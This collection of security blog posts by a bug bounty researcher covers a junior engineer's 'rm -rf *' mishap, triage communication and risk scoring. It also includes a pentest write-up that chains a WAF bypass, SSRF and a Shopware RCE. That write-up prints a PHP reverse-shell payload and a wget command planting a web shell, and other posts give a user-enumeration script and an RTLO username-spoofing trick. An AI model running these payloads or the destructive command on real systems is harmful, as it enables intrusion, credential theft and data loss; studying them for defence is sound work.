Dec, 19th 2020


A few days ago, I identified a severe vulnerability in a private security bug bounty program that enabled remote code execution. A few hours after I submitted the report, I received the answer that they would verify the vulnerability promptly and contact me afterward. Up to this point, it was still routine. But the second answer hit hard and was the beginning of an exciting story that, like a domino effect, revealed several problems.

I identified a remote code execution vulnerability and sent them a report with five commands and their outputs as proof of concept. Since I didn't want to cause any damage, I decided to use the following commands.

1. "uname -a"
2. "id"
3. "df -h"
4. "ls -alF"
5. "cat /etc/hosts"

The first email response was that they would investigate the report. Then the second response was:

            Dear Dave,
            Thank you for your reports and proof of concepts. We are currently understaffed, so our junior engineer tried to verify your remote code execution and used the command "rm -rf *" to see if the web user can cause serious harm. Unfortunately, he has deleted everything. We will try to recover before we can proceed. We will inform you once the issues are fixed and ask you to verify.

I replied that I would stand by and wait for their email.

The third email response was:

        Dear Dave,
        just to give you a status update. We have imported the backups. Unfortunately, we had to find out that we were not performing the backups via cronjob on the system every three days as planned, but inadvertently every three months which means we have now unfortunately irrevocably lost the data from a few weeks on this system. We have now also corrected this error. In the future, we will ensure that we do more pair programming and review with several engineers.
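A quick aside from me: I don't know their actual crontab, but a slip like the one they describe is easy to make - one misplaced field turns "every three days" into roughly "every three months". A purely hypothetical example (the script path is invented):

```
# Intended: run the backup at 02:00 every three days (*/3 in the day-of-month field)
0 2 */3 * * /usr/local/bin/backup.sh

# Actual: the */3 ended up in the month field, i.e. 02:00 on day 1 of every third month
0 2 1 */3 * /usr/local/bin/backup.sh
```

The two lines differ by a single field, which is exactly why such mistakes survive review.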

The fourth email response was:

            Dear Dave,
            Thank you for your patience. We have now improved our backup process and imported the backups as far as possible. Meanwhile, our colleagues from the development department fixed the affected vulnerability in the code. We deployed it as a hotfix and rolled it out. Can you please verify it and let us know whether it is now fixed?


I verified the fix and replied, asking whether they would be willing to discuss this case with me in an interview or chat, because something like this is very likely to happen to many beginners, and sharing it could get the message across and prevent others from making the same mistake. To my surprise and absolute delight, they agreed to do so - provided that neither they nor the company are named.


First of all, I would like to take this opportunity to thank the two engineers concerned for agreeing to conduct this interview with me and for allowing me to quote passages from our previous communication, so that we can use this transparency to sensitize other engineers to the topic.

Seriously: THANK YOU!

Fearing cyberbullying or hateful comments, the two engineers asked to remain anonymous.
Of course, I comply with this request and respect it. We have agreed to call the two engineers "Engineer 1" and "Junior Engineer" from now on to provide context.


Welcome to this session. Thank you again for your courage and transparency. If it's okay with you, I will tag each of you so that it is clear to whom my question is directed and then ask that person to comment. If there is something you do not want to answer, let me know, and we'll skip the point.

@secalert asking Junior Engineer:
Dear Junior Engineer, first of all:
How are you? Hopefully, you've calmed down a bit since that mishap. Would you be so kind as to describe the events from your point of view briefly?

@Junior Engineer:
Yes, sure.
First of all, I want to emphasize that I have learned my lesson. I was surprised by your remote code execution and thought that the frameworks or firewalls we were using would recognize and prevent this.
In August I completed my professional training as an IT specialist for application development and have only been dealing with IT security here in the company since November because I was asked if I would like to take a look at the bug bounty program. Due to the current COVID-19 pandemic and the upcoming holidays, we were understaffed in the company. The colleague asked me if I could take care of the bug bounty emails and could also verify the issues if I understood the content. Since I wanted to help, I gladly accepted the offer and was happy that people believed I could do that.
When I read "remote code execution" in your e-mail, I thought it was all about executing code that does some calculator gimmick or possibly leaves behind a picture of the hacking group. I didn't realize that it could do any real damage to the operating system. And since I now had to assess whether the vulnerability was as bad as you wrote in your impact description, I googled it. Then I scanned the pages and just copied and executed a few of the supposedly bad commands, because I thought that our frameworks or firewalls would recognize and block anything really alarming. And then I found the "rm -rf *" command. When I realized that something was breaking, it was too late, and I was scared. After a few minutes, I dared to tell my colleague what had happened and asked whether he could help me fix it. I'm sorry. I have learned from it, and in the future I will ask my colleagues before doing something like that. That's why I was ready to do this interview, and I hope that other junior engineers can learn from it and not make the same mistake.

Thank you very much for these honest words and the explanation, Junior Engineer.

@secalert asking Engineer 1:
Dear Engineer 1, would you please explain what happened from your perspective and what your first reaction was?

@Engineer 1:
Yes, sure.
It wasn't nice of us to put him alone on this important topic. Of course, he immediately accepted when we asked him. But let's be honest: every one of us would have accepted the task as a young person and would have been happy about it. So I want to protect him and take at least 50% of the blame on my head.

So now to the actual question:
When he came to me and told me about the RCE, it was immediately clear that we had to treat this as a security incident and focus on it. I navigated to the system and saw straight away that our web application no longer worked. I then connected via SSH and saw that the entire application folder was empty, i.e., the data had been deleted. Since we hadn't had to restore any backups on this system for a long time, it was clear that we would be sitting on it for a few hours. So I asked a colleague to take care of the backups. I took over the communication directly and answered you first that we were taking it seriously and dealing with it immediately.

My colleague noticed that the backup was a few weeks old and was surprised. We then looked at the systems and backups together and were initially amazed, not to say desperate. We then looked at the files and configurations and were sorry to find that, when we created the cronjob, we had unfortunately not set a backup of this system every three days, but only every three months. Shocking! We lost the data of the past few weeks as a result. Our luck in misfortune: it is one of the less critical systems and not our crown jewels. So we learned a lot that day. We have already had internal discussions to ensure that such careless mistakes do not happen again.

We are a company with more than 400 employees and therefore wanted to put our systems' security to the test. We heard about bug bounty programs at conferences and seminars and thought one could help us better than having an internal security team. Today we learned that it might not be the best idea to take part in a bug bounty program instead of setting up or training your internal security department, or at least having someone deeply familiar with the matter. We will discuss this again internally, and due to the latest events, there may now be an opening for it.

It was important to me not to gloss over anything, which is why we communicated with you transparently.
And yes: besides the backups, our developers also verified and fixed the issue. Our website is now more secure. I would also like to thank you for the interview, and I am convinced that some people out there can learn from our incident.

I want to thank you both from the bottom of my heart for the insights and the full transparency. If there is anything I can do for you, please write to me at any time. I wish you and your families a merry Christmas.


I honestly have to admit that I thought I was dreaming and that this wasn't really happening. However, it shows us that we are human and, unfortunately, even our willingness to help does not spare us from significant mistakes. Each of us started at some point and made one mistake or another. As long as we learn from them, we can always get better. Hopefully, this contribution and the two engineers' openness will help others prevent such errors from occurring in the first place.

How to react to "it's only a test server" in BBP

Dec, 16th 2020


Every bug bounty hunter sooner or later finds a host or web application that is within the scope defined by the bug bounty program, only to read a response like this:

"That's just a test system without real (user-)data, and thus the evil actor can do no harm to our company or customers. Therefore we will close this as informative."

Sometimes they make you, as a bounty hunter, feel even worse by adding a sentence like:

"We have protected this server by Basic Auth now."


"We have removed this host."

So, basically they are telling you that there is no issue, but they have fixed it anyway? Sounds "interesting" to me.

And since, on most of the bug bounty platforms I know, the "triagers" are unfortunately on the company's side - as the money flows from that side - we bounty hunters hardly have a chance to complain.
But how can one creatively counteract this unjust behavior and learn from it?


Be creative and think of attack scenarios that would be possible with the compromised system!


In the past, an evil actor could abuse open redirect vulnerabilities to trigger XSS via "javascript:", "data:" and other schemes in the context of the page. In modern browsers, this doesn't work anymore. But you can still make use of it for attack scenarios: an open redirect vulnerability can be exploited for blackhat SEO, using strong backlinks to push fake/scam pages higher in the search engines, to cause monetary damage to the affected company's customers or to damage the company's reputation.
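To make this concrete, here is a minimal sketch (hypothetical parameter handling, not any specific site's code) of how a redirect target would need to be validated to reject both scheme-based payloads and off-site redirects - precisely the checks that are missing when such a report lands on a triager's desk:

```python
from urllib.parse import urlparse

# Assumption: these are the domains the site legitimately redirects to.
ALLOWED_HOSTS = {"example.com", "www.example.com"}

def is_safe_redirect(target):
    """Reject scheme-based payloads (javascript:, data:) and off-site hosts."""
    parsed = urlparse(target)
    if parsed.scheme not in ("", "http", "https"):
        return False  # blocks javascript:, data:, and other schemes
    if parsed.netloc and parsed.netloc not in ALLOWED_HOSTS:
        return False  # blocks open redirects to attacker-controlled hosts
    return True
```

A relative path like "/account" passes, while "javascript:alert(1)" and "https://evil.example.net/" are rejected.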


The test server/host itself does not contain PII or any other real data. Is that true? What about data like the names of the administrators and employees who have access to this server via SSH? Many companies apply username rules like "name.surname@host", and these employees have their home folders and bash_history files, which may leak their names as well. With the knowledge of the employees' names and the timestamps of when they last logged in to this system, a spear-phishing or social engineering attack will be more successful. Besides that, an evil actor could compromise this harmless test system and manipulate the SSH login. Once an employee/admin enters his credentials, they are stored in plaintext, and the evil actor can access them. In the worst case, the employee reuses the credentials, and thus the evil actor can use them to compromise other systems.
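As a rough illustration of that recon step (a hypothetical sketch, not a tool used against anyone): once on the box, an attacker could enumerate home directories and check when each user's shell history was last touched:

```python
import os
import time

def enumerate_users(home_root="/home"):
    """List likely usernames and when each last touched their shell history."""
    findings = {}
    for user in os.listdir(home_root):
        hist = os.path.join(home_root, user, ".bash_history")
        if os.path.exists(hist):
            # Modification time approximates the last interactive session.
            findings[user] = time.ctime(os.path.getmtime(hist))
        else:
            findings[user] = None
    return findings
```

Two lines of standard-library code, and the "empty" test server has already leaked a list of employee names and activity patterns.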


Is this test system really isolated and wholly detached from all other systems in the company? In my experience, it unfortunately often is not. Often there is a tunnel and the possibility of misusing this test system as a jump host, accessing the intranet or other company systems that store (sensitive) information.


The evil actor can compromise this system and host illegal content, such as malware, pirated films and software, stolen credit card numbers, or abusive materials. This can give the IP address a bad reputation, which harms the SEO ranking, or get the IP address/website blocked by the web browser's security features such as Safe Browsing. Besides that, lawyers could file a lawsuit against the company due to the illegal material!


It is humanly understandable that the companies concerned often lack the creativity or criminal mindset to come up with these and other scenarios themselves. Besides, there are "triagers" who are required to process an unbelievable number of reports per day, so they unfortunately have too little time to come up with every conceivable scenario for each report. Therefore, it is our task to deal with it. We should think about it in advance and send in five scenarios, hoping for at least a creativity bonus, rather than becoming frustrated and sooner or later walking away from the bug bounty adventure because of such experiences.


Okay, that's it.
I hope you can take something away from my blog post or rethink your opinion about the other side of the coin. :)
Feel free to give me feedback, insights, thoughts on Twitter: @secalert

Communication in bug bounty programs (as triager, researcher, manager)

Dec, 12th 2020


After an exciting exchange with some people on this topic, I decided to explain my perspective and point of view because, since 2009, I have been able to learn and work on the different sides of the security bug bounty world. During this period, I gained experience as a researcher/pentester on one side and as a program manager for three companies that operate their own private bug bounty programs on the other.


I had many exciting and lively exchanges on both sides of the coin, but I don't want to deny a high level of frustration on both sides.

After a few years of dealing with bug bounties, I realized that you can only achieve the right balance if you receive appropriate interpersonal communication training and learn how to communicate gently and with genuine compassion on an interpersonal level.

It is essential to always remain polite and approach the other person with respect and understanding - this is especially true for written text, as you cannot read the other person's emotions from their face and expressions.


In the following section, I would like to show you examples from my own experience that were (a bit) frustrating, how they ultimately turned out, and what was needed to defuse the situation as early as possible in human-to-human communication.

1. Everything written here is my personal view and does not represent my employer! :)

2. Thank you to the affected Researcher for permitting me to cite texts from their messages/emails/reports and show the situations and learn from them.

As a "triager" I regularly received reports from researchers, pentesters, ethical hackers, hobbyists, and bug hunters, which had much potential for improvement. To make things easier, in this text I will use the term "Researcher" instead of picking one of the other titles. Since basically anyone can participate in most bug bounty programs without a certificate of education, grammar and spelling are often severely neglected, which is a fact to be accepted.
If the Researcher doesn't understand, or poorly understands, the attack vector he/she is about to report, things get tricky.

I received a report regarding a potential CSRF issue. The Researcher wrote the following description:

"CSRF enables the attacker to gain remote access to the admin's desktop and all the files he has stored there."

At this point, I could have rated the ticket as "N/A" or "incomplete" because of this description. But that's not what I want. It is my responsibility to ensure that we can either verify the potential risk or refute its existence. It is always important to me to pursue this and to contribute constructively to the solution. It is also essential to invest the time with colleagues to determine when we introduced the vulnerability and whether an evil actor exploited it in the last 14 days (or for however long you can keep log files in the respective context).

Personally, I feel obliged to fulfill an educational mandate.
After verifying the presence of the CSRF vulnerability, I replied to the Researcher.
I told him/her that this attack scenario was exceptional and did not apply to our web application.
Instead, I explained to him/her an attack scenario that applies to us - with the goal and hope that the researcher has a better understanding when he/she reports another CSRF to us next time.

A Researcher reported a race condition which occurred under certain rare circumstances and would lock the database access, raise an error, and leak internal credentials. The Researcher wrote in imperfect English:

"Hi Sirs and Madams, you have code execution in database I get sugar secrets..."

Again, I could reply with "N/A" or "can't reproduce" and move on.
Instead, I read his/her text three times and had a hard time understanding due to the language barrier, so I looked at the screenshots and python script he/she sent us.
After reading the source code, I had a clue what he/she was trying to achieve, but it did not immediately work as a reliable proof of concept. So I took the time to investigate, reviewed the source code to ensure that it did not contain any backdoor or malicious code, and afterwards I ran the script in multiple threads against all of our database (and replica) servers.

After a while, I could reproduce the issue and finally got the expected results.
It turned out that this was a race condition and only applied to one specific database replica server because it had a different configuration that had been used manually in one case for debugging purposes.
The person in charge forgot to undo the changes after the debugging session.
We could immediately fix the issue.

Once solved, I wrote to the Researcher, told him/her the steps needed to reproduce it, and gave him/her a template which he/she can use for such issues in the future.
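Their actual bug and script stay private, but the general class of issue - a non-atomic check-then-act - can be sketched in a few lines. The barrier here is an artificial device that widens the race window so the effect reproduces deterministically:

```python
import threading

class NaiveLock:
    """A broken check-then-act 'lock': the check and the act are not atomic."""
    def __init__(self):
        self.held = False
        self.entered = []                     # who made it into the critical section
        self._barrier = threading.Barrier(2)  # widens the race window deterministically

    def acquire_and_enter(self):
        if not self.held:                     # 1. check
            self._barrier.wait()              # both threads pass the check before either acts
            self.held = True                  # 2. act - too late, the other thread saw held == False too
            self.entered.append(threading.get_ident())  # list.append is atomic under the GIL

def demo():
    lock = NaiveLock()
    threads = [threading.Thread(target=lock.acquire_and_enter) for _ in range(2)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return len(lock.entered)  # both threads entered a section meant for one
```

In the wild, the window between check and act is a few microseconds, which is exactly why such reports only reproduce when you hammer the target with many concurrent attempts.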


As a researcher, I've reported many issues and potential risks to several companies. Sometimes, there was a critique or misunderstanding due to different skills or the language barrier, but it was finally an enjoyable experience and communication. In conclusion, I've had more positive than negative experiences with (private) bug bounty programs.


I remember a case very well where I've received a low bounty due to my initial proof of concept. Three weeks later, the company increased the bounty to the highest amount because their internal security team found other systems affected by the same issue and root cause.


By accident, I identified a template injection which led to RCE on a well-known website. You wonder how? I visited the website as a customer, and the rendered HTML showed me some errors. My curiosity made me look for the frameworks in use. I then downloaded these frameworks and started my research, which finally led to the RCEs I identified, now known as CVE-2016-4977. When I contacted the company and sent them a report with my research, they told me they ran a private bug bounty program and asked me to register for it. I did so, and after a few days, I got a bounty for these findings. That was pretty generous of them. They could have taken it for free, or invited me to the program but told me that I would not receive a reward because I sent them the report before being part of the program. I am very thankful for how they handled this.


It happened to me three times that I reported an issue, which they triaged and verified quickly, but then months passed without a reply. Finally, I received the message that the program had ended and was no longer active, which meant that I did not receive any reward. Of course, I was very frustrated and tried to involve a mediator who, in all three cases, told me that there was nothing he/she could do once the company quits the bug bounty program. Finally, I had to accept it and move on.

Are there any lessons learned for me?
Yes, sure. I learned that I have to ask for an update before the six-month period ends - for example, after three months - and if they don't reply after four months, kindly ask once again.
This time I tell the company that if they don't respond after five months, I will request mediation on the bug bounty platform and hope for polite treatment.


My recommendations to researchers:

Thank you for your efforts to make the Internet more secure! You are amazing!

1. Be polite and invest the time to describe an attack scenario that applies to the actual website/service against which you have performed the penetration test.

2. Whenever possible, include a video as proof of concept, especially if chances are high that you will run into language barriers.

3. It is nice to know and be able to reference "ASVS", "CVSS", "CWE", "D.R.E.A.D.", "STRIDE", and similar scoring methods, best practices, or standards - but in my experience, to the affected company it is often more important to have the following questions answered as early as possible in your report:

3.1. Is PII (especially GDPR Article 9 data) at risk?

3.2. CIA: does the issue harm the confidentiality, integrity, or the availability of the affected information?

3.3. Is user interaction (by the victim) needed for successful exploitation?

3.4. Is authentication needed for successful exploitation?

My recommendations to Triagers:

Thank you for your efforts to make the Internet more secure! You are amazing!

1. Please be polite, keep calm, and believe in the good in people.
If you think the Researcher is rude: maybe it's only due to the language barrier or a lack of skill.

2. Keep in mind that (sensitive) information (e.g., PII) may be at risk.
If the Researcher got the CVSS rating wrong, maybe the attack vector simply does not fit CVSS well. Please don't let this be the only reason not to investigate the issue properly. Instead, correct the CVSS and give the issue the importance it needs!

3. If you don't understand the issue or its impact, please take the time to ask the Researcher your questions.

4. If you come to the conclusion that it is "n/a" or "can't reproduce", please take the time to explain it to the Researcher and, if possible, give them a hint about what they can do better next time.

5. As the triager, you have to know what kind of information is at risk on the vulnerable system. If you don't know, feel free to ask the responsible owner. The Researcher will often not have internal information such as a full list of protection-worthy data, flow diagrams, database schemas, threat models, and abuse potential analyses - so forcing them to guess what kind of information "could" be at risk is a waste of time and will most likely frustrate both the Researcher and you as a triager.

My questions to a company that wants to join a (public) security bug bounty program:

1. Are you aware that running a security bug bounty program is very time-consuming?
Most likely, you should plan for a full-time employee!

2. Do you have employees that have the skills needed to verify the (technical) security issues?

3. Do you have a program manager who is trained in interpersonal communication and rhetoric and can keep calm? Someone who acts as a mediator if the Researcher is rude or frustrated, to ensure that the situation does not quickly escalate on a personal level?

4. As the responsible owner and person in charge, you have to know what kind of information is at risk on the vulnerable system. If you don't know, how can you expect the Researcher to know?

5. Please consider sharing information such as a list of protection-worthy data, flow diagrams, threat models, or abuse potential analyses with the Researchers (with an NDA and permission to attack).

6. Are you able to offer a staging system so that the Researchers do not have to penetrate your production systems?
If not, please be aware that your production systems may get harmed.

7. If you want to share the security report with your colleagues in a ticketing system like JIRA, consider sharing a template with the Researcher, so that the Researcher can supply you with a formatted report. :)

My questions to the owners of public bug bounty platforms:

1. Do you treat the companies and the researchers on your platform alike?

2. Do you have trained personnel to mediate and help whenever the communication between the "triager" and the researcher escalates?

3. Do you force the researcher to describe, e.g., OWASP Top 10 risks over and over again instead of offering them a well-written description of common weaknesses?

Please keep in mind that, as a platform, you can take the burden off the shoulders of the researchers and triagers if you offer them the opportunity to select the description from a drop-down menu instead of letting them describe and potentially misrepresent these issues.

4. Do you encourage the employees of the companies that want to join your program to learn the basics of (web) security issues before they have their own "triagers" participating in the program?

5. Are you willing to remove a triager or researcher from the program who misbehaves in the communication at any time?

6. Whenever possible: do you offer target scope definitions as configuration files for the most common security tools?


Okay, that's it.
I hope you can take something away from my blog post or rethink your opinion about the other side of the coin. :)
Feel free to give me feedback, insights, thoughts on Twitter: @secalert

How to evolve an alternative approach to risk assessment (Part I)

Dec, 11th 2020


This text aims to present an alternative approach to risk assessment. Unfortunately, many companies neglect risk management and information security and address them only because, for example, as a listed company, they have to meet the relevant requirements.
A dedicated employee or a small team is then assigned to this topic and works on it in isolation. The other departments come into contact with these colleagues once a year during the IT audit, are caught entirely by surprise, and perceive it as an inevitable burden they have to endure.
And how do you bring information security into line with today's fast-paced world of work - for example, in eCommerce, where every feature, no matter how small, is essential to not lose touch with the industry leaders?
How can you ensure there is no bottleneck in an agile development environment if you want to subject every feature to a thorough security check before going live? Business first / feature first mentality? Business vs. information security?
How about, however, if the management firmly believes that information security is an integral part of the relationship of trust with customers and business partners?


In this case, we consider a company with 2,000+ employees. The management prioritizes the importance of information security and data protection and attaches great importance to ensuring that ALL employees receive appropriate basic training.

Develop the value chain and protection requirements

It is important to work out with the management, in joint meetings and workshops, how the company earns money and what the value chain looks like. The next step is to break the value chain down into individual elements and determine the crown jewels. A classification of the protected objects is then required. Once this has been defined, it can be determined together with the management what protection requirements these objects have in terms of confidentiality, integrity, and availability. From this, the security priority, the required trust boundaries, and the priority with which a security incident must be processed are derived.


Security concerns us all. It is important to sensitize every employee to the topic and explain that each employee is part of the overall concept of information security and that we can only be successful if we work together. All employees are important and must be valued - this also includes mandatory basic training in information security, regardless of whether they work in the IT department, in purchasing, in marketing, or as a craftsman or caretaker.


As soon as a relationship of trust and openness toward information security has been established in the organization, employees will approach the members of the security team on their own and ask questions or point out phishing and scam campaigns. It is important to thank these employees for their awareness and express that they are essential to customers, partners, and colleagues. That is an important milestone.

Next step - decentralized data protection and security management process

What do the company structure and organization chart look like? Are there project managers or product managers? Suppose this is the case, and they are responsible for product development and the implementation of business goals. In that case, it can be worked out with them in dedicated workshops that they are also data owners and therefore responsible for data protection. If everyone shares this common understanding, we can integrate them into a decentralized data protection and security management group. At this point, something changes: the IT audit or the security team no longer has to proactively approach the team or product owner to carry out a security audit. Instead, the product owner recognizes the added value, proactively requests security audits, and has them carried out.


From the point of view of vulnerability management, we know established scoring methods and systems such as "CVSS", "D.R.E.A.D.", "S.T.R.I.D.E.", and more. However, these are often technical, and one has the feeling that too much subjectivity influences the result. For example, a web security expert will presumably rate attack vectors such as "CSRF", "XSS", and "local file exposure" more critically than a dyed-in-the-wool system administrator, who will probably only associate "remote code execution" or "SQL injection" with real danger and rate everything else as low per se. So if the technicians already disagree, how are non-technical product owners, of all people, supposed to understand the assessment?


First of all, it is essential to note that this proposal introduces a risk management process that is accepted and understood by the workforce, and that the responsible owners have received the relevant workshop and a brief introduction on how to understand the questions. The aim should be to ask a maximum of ten objective questions that show the person responsible at a glance whether they must remedy this risk immediately or whether they can consciously accept the risk for a period of a few weeks in favor of the business priorities.

QUESTIONS TO BE ASKED for a proper RISK evaluation

The following questions do not fit every context or every company, but represent an example that has worked well for me. It serves only as a suggestion and should by no means be adopted one-to-one. The questions can be implemented in a web form so that you have static questions whose answers can be chosen from a drop-down menu or, if necessary, from a multi-select field.

Is sensitive information at risk?
YES: trade secrets
YES: intellectual property (i.e. source code)

CIA: does the issue harm the confidentiality, integrity, or availability of the affected information?

Is user interaction (by the victim) needed for successful exploitation?

Is the Risk publicly known?
YES: MITRE, CVE, BLOG, Social Media
YES: external Researcher reported to us
YES: Customer or Partner reported to us

Could we verify the finding with our five commonly used security tools?

Are there log files that we can investigate?

Are detective measures in place?
YES: monitoring
YES: email alerting

Can we immediately apply a quick-win remediation until the issue is properly fixed?


Based on these eight questions, we can set up a proper risk score evaluation, define numeric values for the answers, and add them up. In my case, the score leads to the conclusion that the risk is either "severe" and therefore has to be handled urgently (i.e., within three days), or the risk is mediocre and should be taken care of within the next 90 days. In my next blog post (part II), I will guide you through three real-life examples and share the scripts that allow you to automatically get a proper risk evaluation based on these criteria.
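A minimal sketch of such a scoring script, where the weights and the "severe" threshold are my own illustrative assumptions and not a fixed standard:

```python
# Illustrative risk scoring based on the eight questions above.
# Weights and thresholds are assumptions for demonstration only.
WEIGHTS = {
    "sensitive_information_at_risk": 3,
    "cia_harmed": 3,
    "user_interaction_needed": -1,      # required victim interaction lowers the risk
    "publicly_known": 3,
    "verified_with_our_tools": 2,
    "log_files_available": -1,          # we can investigate, slightly lowers urgency
    "detective_measures_in_place": -1,
    "quick_win_remediation_possible": -2,
}

def risk_score(answers):
    """answers: dict mapping question key -> bool (YES/NO)."""
    return sum(w for q, w in WEIGHTS.items() if answers.get(q))

def risk_rating(score):
    # "severe" must be handled urgently (e.g. within three days),
    # everything else within the next 90 days.
    return "severe" if score >= 6 else "mediocre"

answers = {
    "sensitive_information_at_risk": True,
    "cia_harmed": True,
    "publicly_known": True,
}
score = risk_score(answers)
print(score, risk_rating(score))  # 9 severe
```

A real implementation would feed the web-form answers into such a function and present the rating directly to the risk owner.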

Stay tuned!
Feel free to give me feedback, insights, thoughts on Twitter: @secalert


June, 30th 2020


In this blog post, I will write about my thinking process during a security audit and share my failed attempts with you as well. I hope that we can inspire and motivate each other in the community to stay tuned and learn from ideas that were not successful in this particular case but can lead to success in other (corner) cases in the future.


We will perform information gathering, bypass a filter, abuse an SSRF, discover a zero-day RCE during research, and finally exfiltrate sensitive information.


Back in 2016, I had performed a penetration test for which I received minimal information upfront. The goal was to infiltrate the target and access their internal systems or to exfiltrate (sensitive) internal information.

The scope was *!


During the information-gathering phase, I crawled the web site and extracted the frameworks revealed in the HTML source or HTTP response headers. Once this step was finished, I manually reviewed the structures and started to look for version disclosures.

I quickly discovered that the company's blog was running WordPress. So one obvious step for me was to check whether I could access any admin interfaces or files without logging in.
That was not the case here, so next I checked the rendered HTML source and found a reference to the "xmlrpc.php" file.

When I tried to access the file, the server returned a "404 not found" error message. Since the file was referenced in the HTML code, I thought that they were probably using a WAF and had the "xmlrpc.php" on a blocked-list for any access from an IP address which is not part of their company network.


So quite naturally, I attempted to bypass the blocked-list by using the following encoding combinations:

1. add a slash to the URL like this ""
2. urlencode the slash once: ""
3. urlencode the slash twice: ""
4. urlencode the slash once and urlencode one other char: ""
5. urlencode the slash and one other char twice: "" Success!

The successful condition utilized double URL-encoding: the WAF/application decoded the user-submitted input only once before performing the string comparison against the blocked-list.

So the fifth payload, with double URL-encoding, bypassed their filter, and I could now access the "XMLRPC" controller from an external IP address.
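The decode-once mismatch can be reproduced in a few lines. This is a sketch: the blocked string and payload are illustrative, since the exact URLs are elided above.

```python
from urllib.parse import unquote

BLOCKED = ["xmlrpc.php"]

def waf_allows(raw_path):
    # The WAF decodes the user-submitted input only ONCE
    # before comparing against the blocked-list.
    decoded_once = unquote(raw_path)
    return not any(b in decoded_once for b in BLOCKED)

def application_resolves(raw_path):
    # The application (or a second layer) decodes AGAIN.
    return unquote(unquote(raw_path))

payload = "/xmlrpc%252ephp"      # "%25" is a percent-encoded "%"
assert waf_allows(payload)       # WAF sees "/xmlrpc%2ephp": no blocklist match
assert application_resolves(payload) == "/xmlrpc.php"
```

The mismatch in the number of decoding passes between filter and application is the whole bug class.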

The next step was to check, by exploiting the existing endpoint, whether it was possible to perform out-of-band HTTP requests.
I looked for an older version of the "XMLRPC" controller so that I could use the "" method to make outbound requests to my external server and expose internal IP addresses or other routes that, for example, are not behind a DDoS protection like the one Cloudflare or Akamai offers.

To verify whether the "" method is available, I posted a request to list the available methods.

The "" method is available on the target system. Nice!
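Listing the methods is the standard "system.listMethods" XML-RPC call; the request body one would POST to the controller can be built with Python's standard library (the target endpoint is omitted here, as in the post):

```python
import xmlrpc.client

# Build the XML-RPC request body that would be POSTed to the xmlrpc.php endpoint.
body = xmlrpc.client.dumps((), methodname="system.listMethods")
print(body)
```

The server's response enumerates every method the controller exposes, which is how one spots the interesting outbound-request methods.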

The next step is to check if we can make out-of-band HTTP requests so that we can potentially abuse this like a Server-side Request Forgery (SSRF) later and use it to gain access to internal hosts and (sensitive) internal information.


The HTTP request was successful; however, I had not yet gained access to any potentially sensitive information. At this point, I could enumerate or brute-force internal server names.

I decided to check for internal hostnames by using "" or a similar service, which helps to quickly identify subdomains or internal-only hosts because the hostnames leak through public SSL certificates.

I found a few generic-sounding subdomains like "", "", "", but I did not know what software was running there. One that caught my attention was:

Next, I spent my time looking for publicly available exploits for Shopware that would allow me to obtain code execution. No exploits were found, so I decided to dig deeper and hunt for zero-days in Shopware myself.


I downloaded the source code of Shopware and hunted for zero-day vulnerabilities. After a couple of hours of research, I identified a remote code execution in the "/backend/Login/load" module. After investigating the root cause and identifying the sinks, I wrote proof-of-concept exploit code and verified it against my local Shopware installation so that I could add this exploit to my exploit chain in this pentest.


Now my attack scenario looked like this:
1. bypass the filter to access restricted methods such as "" in the "xmlrpc.php"
2. use the "" method to make an HTTP GET request to the internal Shopware host
3. use the RCE exploit to finally spawn a reverse shell on the target system or exfiltrate internal information


This is an (incomplete) threat model showing the trust boundaries I had in mind.


The final chained exploit code is shown in the next screenshot.
So that it can be read easily, I've attached it in plaintext in the picture. Hint: the original request was URL-encoded before being sent.

At this point we could also have tried to spawn a reverse-shell like this:
${{`php -r '$sock=fsockopen("",23232);exec("/bin/sh -i <&3 >&3 2>&3");'`}}
or place a web shell on the target system like this:
wget;chmod +x webshell.php
and from this point use the web shell instead of the issue in Shopware.


I had lots of fun while performing this pentest. I was thrilled to find any exploitable issue in Shopware because I was highly motivated to gain access to internal systems and data.
My research of the Shopware source code led to CVE-2016-3109.

After the pentest, the target company told me that they had been evaluating Shopware on this internal system and had not yet put effort into protecting it.

Fortunately, there are many talented people in the infosec community today who share their findings with us and blog about them or post them on Twitter. Thanks for that.
You are awesome!

Unfortunately, these posts are sometimes short and focus on the final exploit code and show the happy path without giving more in-depth insights into the researcher's mindset. In my opinion, these thoughts are worth their weight in gold and are incredibly inspiring.

Hopefully, this article gave you insights and motivates you to stay focused and not give up if you cannot quickly find severe issues in your target scope.


I want to thank the Shopware Team for a very friendly and professional communication when I contacted them and supplied the proof of concept for what later became CVE-2016-3109.

Also I want to thank the following individuals for proof-reading this blog post:


There are a few nice articles by other researchers regarding the "xmlrpc" controller: 1.



4. If you know other cool articles, drop me a message and I will add the references :)

From RTLO to alleged admin

JUL, 4th 2020


In this blog post, I want to share a little issue I had first discovered back in 2018 that can be used as part of your Security Awareness campaigns.


I couldn't register as "admin" or "Administrator", so I registered as another user and afterward changed my username using Unicode, because I wanted to trick the web application into showing it as "administrator" and thus facilitate phishing attacks.


Frequently, the registration controller is disabled. I would still recommend checking whether it is enabled and accessible when hunting for issues.


The target web site allowed a customer to register and post comments in WordPress located at: .

I had tried to register with familiar names like "admin" or "administrator," which was not allowed. So I tried registering with Unicode look-alike characters that would look pretty much the same as "admin" but still be a different name. It did not work.

So I registered using "administrators" with a trailing "s". I had received an email for double-opt-in and verified the registration by visiting the link:

side finding:
It is worth mentioning that my username in the "login" param is exposed in cleartext to third-party websites via the HTTP Referer header, which in itself could already be a GDPR case.


I had successfully registered as "administrators", but there was not much I could do with it because I was still a normal user. So I wondered: does the change-username process work the same way as the registration process?

I tried to rename my username from "administrators" to "admin". WordPress did not allow me to change to this username.


Next I thought about RTLO (right-to-left override) which is U+202E in Unicode.

So I tried to rename it to:

which consists of "%E2%80%AE", the URL-encoded form of the RTLO sequence, followed by "rotartsinimda", the reversed string of "administrator".
This was accepted.
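The rename payload can be reconstructed in a few lines (a sketch of how the value is built):

```python
from urllib.parse import quote

RTLO = "\u202e"                        # right-to-left override character
reversed_name = "administrator"[::-1]  # "rotartsinimda"
payload = RTLO + reversed_name

# URL-encoded, the RTLO sequence becomes %E2%80%AE:
assert quote(RTLO) == "%E2%80%AE"
assert reversed_name == "rotartsinimda"
# A renderer honoring the bidi override displays the payload as "administrator".
```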

I then navigated to the comment section to verify whether the RTLO had worked or whether the web application showed my username as "rotartsinimda".

The RTLO sequence worked: the web browser parsed it successfully and showed my username as "administrator".
This fact facilitates phishing attacks, because an average user would trust a comment posted by an administrator, such as "Your session has expired. Please click here to relogin" with a link pointing to an attacker-controlled domain or similar.


